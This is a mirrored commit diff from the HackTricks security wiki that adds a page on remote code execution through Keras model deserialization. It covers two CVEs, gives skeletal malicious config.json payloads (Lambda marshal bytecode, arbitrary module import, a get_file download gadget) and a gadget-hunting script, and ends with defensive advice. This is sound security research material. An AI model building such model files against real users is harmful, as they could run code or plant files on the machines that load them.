mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Merge pull request #1313 from HackTricks-wiki/update_Hunting_Vulnerabilities_in_Keras_Model_Deserializa_20250820_124658
Hunting Vulnerabilities in Keras Model Deserialization
This commit is contained in:
		
						commit
						1624c21cd4
					
				| @ -177,6 +177,15 @@ with tarfile.open("symlink_demo.model", "w:gz") as tf: | |||||||
|     tf.add(PAYLOAD)                      # rides the symlink |     tf.add(PAYLOAD)                      # rides the symlink | ||||||
| ``` | ``` | ||||||
| 
 | 
 | ||||||
|  | ### Deep-dive: Keras .keras deserialization and gadget hunting | ||||||
|  | 
 | ||||||
|  | For a focused guide on .keras internals, Lambda-layer RCE, the arbitrary import issue in ≤ 3.8, and post-fix gadget discovery inside the allowlist, see: | ||||||
|  | 
 | ||||||
|  | 
 | ||||||
|  | {{#ref}} | ||||||
|  | ../generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md | ||||||
|  | {{#endref}} | ||||||
|  | 
 | ||||||
| ## References | ## References | ||||||
| 
 | 
 | ||||||
| - [OffSec blog – "CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data"](https://www.offsec.com/blog/cve-2024-12029/) | - [OffSec blog – "CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data"](https://www.offsec.com/blog/cve-2024-12029/) | ||||||
|  | |||||||
| @ -69,6 +69,7 @@ | |||||||
|   - [Bypass Python sandboxes](generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md) |   - [Bypass Python sandboxes](generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md) | ||||||
|     - [LOAD_NAME / LOAD_CONST opcode OOB Read](generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md) |     - [LOAD_NAME / LOAD_CONST opcode OOB Read](generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md) | ||||||
|   - [Class Pollution (Python's Prototype Pollution)](generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md) |   - [Class Pollution (Python's Prototype Pollution)](generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md) | ||||||
|  |   - [Keras Model Deserialization Rce And Gadget Hunting](generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md) | ||||||
|   - [Python Internal Read Gadgets](generic-methodologies-and-resources/python/python-internal-read-gadgets.md) |   - [Python Internal Read Gadgets](generic-methodologies-and-resources/python/python-internal-read-gadgets.md) | ||||||
|   - [Pyscript](generic-methodologies-and-resources/python/pyscript.md) |   - [Pyscript](generic-methodologies-and-resources/python/pyscript.md) | ||||||
|   - [venv](generic-methodologies-and-resources/python/venv.md) |   - [venv](generic-methodologies-and-resources/python/venv.md) | ||||||
|  | |||||||
| @ -7,6 +7,7 @@ | |||||||
| 
 | 
 | ||||||
| - [**Pyscript hacking tricks**](pyscript.md) | - [**Pyscript hacking tricks**](pyscript.md) | ||||||
| - [**Python deserializations**](../../pentesting-web/deserialization/README.md) | - [**Python deserializations**](../../pentesting-web/deserialization/README.md) | ||||||
|  | - [**Keras model deserialization RCE and gadget hunting**](keras-model-deserialization-rce-and-gadget-hunting.md) | ||||||
| - [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/README.md) | - [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/README.md) | ||||||
| - [**Basic python web requests syntax**](web-requests.md) | - [**Basic python web requests syntax**](web-requests.md) | ||||||
| - [**Basic python syntax and libraries**](basic-python.md) | - [**Basic python syntax and libraries**](basic-python.md) | ||||||
|  | |||||||
| @ -0,0 +1,219 @@ | |||||||
|  | # Keras Model Deserialization RCE and Gadget Hunting | ||||||
|  | 
 | ||||||
|  | {{#include ../../banners/hacktricks-training.md}} | ||||||
|  | 
 | ||||||
|  | This page summarizes practical exploitation techniques against the Keras model deserialization pipeline, explains the native .keras format internals and attack surface, and provides a researcher toolkit for finding Model File Vulnerabilities (MFVs) and post-fix gadgets. | ||||||
|  | 
 | ||||||
|  | ## .keras model format internals | ||||||
|  | 
 | ||||||
|  | A .keras file is a ZIP archive containing at least: | ||||||
|  | - metadata.json – generic info (e.g., Keras version) | ||||||
|  | - config.json – model architecture (primary attack surface) | ||||||
|  | - model.weights.h5 – weights in HDF5 | ||||||
|  | 
 | ||||||
|  | The config.json drives recursive deserialization: Keras imports modules, resolves classes/functions and reconstructs layers/objects from attacker-controlled dictionaries. | ||||||
|  | 
 | ||||||
|  | Example snippet for a Dense layer object: | ||||||
|  | 
 | ||||||
|  | ```json | ||||||
|  | { | ||||||
|  |   "module": "keras.layers", | ||||||
|  |   "class_name": "Dense", | ||||||
|  |   "config": { | ||||||
|  |     "units": 64, | ||||||
|  |     "activation": { | ||||||
|  |       "module": "keras.activations", | ||||||
|  |       "class_name": "relu" | ||||||
|  |     }, | ||||||
|  |     "kernel_initializer": { | ||||||
|  |       "module": "keras.initializers", | ||||||
|  |       "class_name": "GlorotUniform" | ||||||
|  |     } | ||||||
|  |   } | ||||||
|  | } | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | Deserialization performs: | ||||||
|  | - Module import and symbol resolution from module/class_name keys | ||||||
|  | - from_config(...) or constructor invocation with attacker-controlled kwargs | ||||||
|  | - Recursion into nested objects (activations, initializers, constraints, etc.) | ||||||
|  | 
 | ||||||
|  | Historically, this exposed three primitives to an attacker crafting config.json: | ||||||
|  | - Control of what modules are imported | ||||||
|  | - Control of which classes/functions are resolved | ||||||
|  | - Control of kwargs passed into constructors/from_config | ||||||
|  | 
 | ||||||
|  | ## CVE-2024-3660 – Lambda-layer bytecode RCE | ||||||
|  | 
 | ||||||
|  | Root cause: | ||||||
|  | - Lambda.from_config() used python_utils.func_load(...) which base64-decodes and calls marshal.loads() on attacker bytes; Python unmarshalling can execute code. | ||||||
|  | 
 | ||||||
|  | Exploit idea (simplified payload in config.json): | ||||||
|  | 
 | ||||||
|  | ```json | ||||||
|  | { | ||||||
|  |   "module": "keras.layers", | ||||||
|  |   "class_name": "Lambda", | ||||||
|  |   "config": { | ||||||
|  |     "name": "exploit_lambda", | ||||||
|  |     "function": { | ||||||
|  |       "function_type": "lambda", | ||||||
|  |       "bytecode_b64": "<attacker_base64_marshal_payload>" | ||||||
|  |     } | ||||||
|  |   } | ||||||
|  | } | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | Mitigation: | ||||||
|  | - Keras enforces safe_mode=True by default. Serialized Python functions in Lambda are blocked unless a user explicitly opts out with safe_mode=False. | ||||||
|  | 
 | ||||||
|  | Notes: | ||||||
|  | - Legacy formats (older HDF5 saves) or older codebases may not enforce modern checks, so “downgrade” style attacks can still apply when victims use older loaders. | ||||||
|  | 
 | ||||||
|  | ## CVE-2025-1550 – Arbitrary module import in Keras ≤ 3.8 | ||||||
|  | 
 | ||||||
|  | Root cause: | ||||||
|  | - _retrieve_class_or_fn used unrestricted importlib.import_module() with attacker-controlled module strings from config.json. | ||||||
|  | - Impact: Arbitrary import of any installed module (or attacker-planted module on sys.path). Import-time code runs, then object construction occurs with attacker kwargs. | ||||||
|  | 
 | ||||||
|  | Exploit idea: | ||||||
|  | 
 | ||||||
|  | ```json | ||||||
|  | { | ||||||
|  |   "module": "maliciouspkg", | ||||||
|  |   "class_name": "Danger", | ||||||
|  |   "config": {"arg": "val"} | ||||||
|  | } | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | Security improvements (Keras ≥ 3.9): | ||||||
|  | - Module allowlist: imports restricted to official ecosystem modules: keras, keras_hub, keras_cv, keras_nlp | ||||||
|  | - Safe mode default: safe_mode=True blocks unsafe Lambda serialized-function loading | ||||||
|  | - Basic type checking: deserialized objects must match expected types | ||||||
|  | 
 | ||||||
|  | ## Post-fix gadget surface inside allowlist | ||||||
|  | 
 | ||||||
|  | Even with allowlisting and safe mode, a broad surface remains among allowed Keras callables. For example, keras.utils.get_file can download arbitrary URLs to user-selectable locations. | ||||||
|  | 
 | ||||||
|  | Gadget via Lambda that references an allowed function (not serialized Python bytecode): | ||||||
|  | 
 | ||||||
|  | ```json | ||||||
|  | { | ||||||
|  |   "module": "keras.layers", | ||||||
|  |   "class_name": "Lambda", | ||||||
|  |   "config": { | ||||||
|  |     "name": "dl", | ||||||
|  |     "function": {"module": "keras.utils", "class_name": "get_file"}, | ||||||
|  |     "arguments": { | ||||||
|  |       "fname": "artifact.bin", | ||||||
|  |       "origin": "https://example.com/artifact.bin", | ||||||
|  |       "cache_dir": "/tmp/keras-cache" | ||||||
|  |     } | ||||||
|  |   } | ||||||
|  | } | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | Important limitation: | ||||||
|  | - Lambda.call() prepends the input tensor as the first positional argument when invoking the target callable. Chosen gadgets must tolerate an extra positional arg (or accept *args/**kwargs). This constrains which functions are viable. | ||||||
|  | 
 | ||||||
|  | Potential impacts of allowlisted gadgets: | ||||||
|  | - Arbitrary download/write (path planting, config poisoning) | ||||||
|  | - Network callbacks/SSRF-like effects depending on environment | ||||||
|  | - Chaining to code execution if written paths are later imported/executed or added to PYTHONPATH, or if a writable execution-on-write location exists | ||||||
|  | 
 | ||||||
|  | ## Researcher toolkit | ||||||
|  | 
 | ||||||
|  | 1) Systematic gadget discovery in allowed modules | ||||||
|  | 
 | ||||||
|  | Enumerate candidate callables across keras, keras_nlp, keras_cv, keras_hub and prioritize those with file/network/process/env side effects. | ||||||
|  | 
 | ||||||
|  | ```python | ||||||
|  | import importlib, inspect, pkgutil | ||||||
|  | 
 | ||||||
|  | ALLOWLIST = ["keras", "keras_nlp", "keras_cv", "keras_hub"] | ||||||
|  | 
 | ||||||
|  | seen = set() | ||||||
|  | 
 | ||||||
|  | def iter_modules(mod): | ||||||
|  |     if not hasattr(mod, "__path__"): | ||||||
|  |         return | ||||||
|  |     for m in pkgutil.walk_packages(mod.__path__, mod.__name__ + "."): | ||||||
|  |         yield m.name | ||||||
|  | 
 | ||||||
|  | candidates = [] | ||||||
|  | for root in ALLOWLIST: | ||||||
|  |     try: | ||||||
|  |         r = importlib.import_module(root) | ||||||
|  |     except Exception: | ||||||
|  |         continue | ||||||
|  |     for name in iter_modules(r): | ||||||
|  |         if name in seen: | ||||||
|  |             continue | ||||||
|  |         seen.add(name) | ||||||
|  |         try: | ||||||
|  |             m = importlib.import_module(name) | ||||||
|  |         except Exception: | ||||||
|  |             continue | ||||||
|  |         for n, obj in inspect.getmembers(m): | ||||||
|  |             if inspect.isfunction(obj) or inspect.isclass(obj): | ||||||
|  |                 sig = None | ||||||
|  |                 try: | ||||||
|  |                     sig = str(inspect.signature(obj)) | ||||||
|  |                 except Exception: | ||||||
|  |                     pass | ||||||
|  |                 doc = (inspect.getdoc(obj) or "").lower() | ||||||
|  |                 text = f"{name}.{n} {sig} :: {doc}" | ||||||
|  |                 # Heuristics: look for I/O or network-ish hints | ||||||
|  |                 if any(x in doc for x in ["download", "file", "path", "open", "url", "http", "socket", "env", "process", "spawn", "exec"]): | ||||||
|  |                     candidates.append(text) | ||||||
|  | 
 | ||||||
|  | print("\n".join(sorted(candidates)[:200])) | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | 2) Direct deserialization testing (no .keras archive needed) | ||||||
|  | 
 | ||||||
|  | Feed crafted dicts directly into Keras deserializers to learn accepted params and observe side effects. | ||||||
|  | 
 | ||||||
|  | ```python | ||||||
|  | from keras import layers | ||||||
|  | 
 | ||||||
|  | cfg = { | ||||||
|  |   "module": "keras.layers", | ||||||
|  |   "class_name": "Lambda", | ||||||
|  |   "config": { | ||||||
|  |     "name": "probe", | ||||||
|  |     "function": {"module": "keras.utils", "class_name": "get_file"}, | ||||||
|  |     "arguments": {"fname": "x", "origin": "https://example.com/x"} | ||||||
|  |   } | ||||||
|  | } | ||||||
|  | 
 | ||||||
|  | layer = layers.deserialize(cfg, safe_mode=True)  # Observe behavior | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | 3) Cross-version probing and formats | ||||||
|  | 
 | ||||||
|  | Keras exists in multiple codebases/eras with different guardrails and formats: | ||||||
|  | - TensorFlow built-in Keras: tensorflow/python/keras (legacy, slated for deletion) | ||||||
|  | - tf-keras: maintained separately | ||||||
|  | - Multi-backend Keras 3 (official): introduced native .keras | ||||||
|  | 
 | ||||||
|  | Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover regressions or missing guards. | ||||||
|  | 
 | ||||||
|  | ## Defensive recommendations | ||||||
|  | 
 | ||||||
|  | - Treat model files as untrusted input. Only load models from trusted sources. | ||||||
|  | - Keep Keras up to date; use Keras ≥ 3.9 to benefit from allowlisting and type checks. | ||||||
|  | - Do not set safe_mode=False when loading models unless you fully trust the file. | ||||||
|  | - Consider running deserialization in a sandboxed, least-privileged environment without network egress and with restricted filesystem access. | ||||||
|  | - Enforce allowlists/signatures for model sources and integrity checking where possible. | ||||||
|  | 
 | ||||||
|  | ## References | ||||||
|  | 
 | ||||||
|  | - [Hunting Vulnerabilities in Keras Model Deserialization (huntr blog)](https://blog.huntr.com/hunting-vulnerabilities-in-keras-model-deserialization) | ||||||
|  | - [Keras PR #20751 – Added checks to serialization](https://github.com/keras-team/keras/pull/20751) | ||||||
|  | - [CVE-2024-3660 – Keras Lambda deserialization RCE](https://nvd.nist.gov/vuln/detail/CVE-2024-3660) | ||||||
|  | - [CVE-2025-1550 – Keras arbitrary module import (≤ 3.8)](https://nvd.nist.gov/vuln/detail/CVE-2025-1550) | ||||||
|  | - [huntr report – arbitrary import #1](https://huntr.com/bounties/135d5dcd-f05f-439f-8d8f-b21fdf171f3e) | ||||||
|  | - [huntr report – arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3) | ||||||
|  | 
 | ||||||
|  | {{#include ../../banners/hacktricks-training.md}} | ||||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user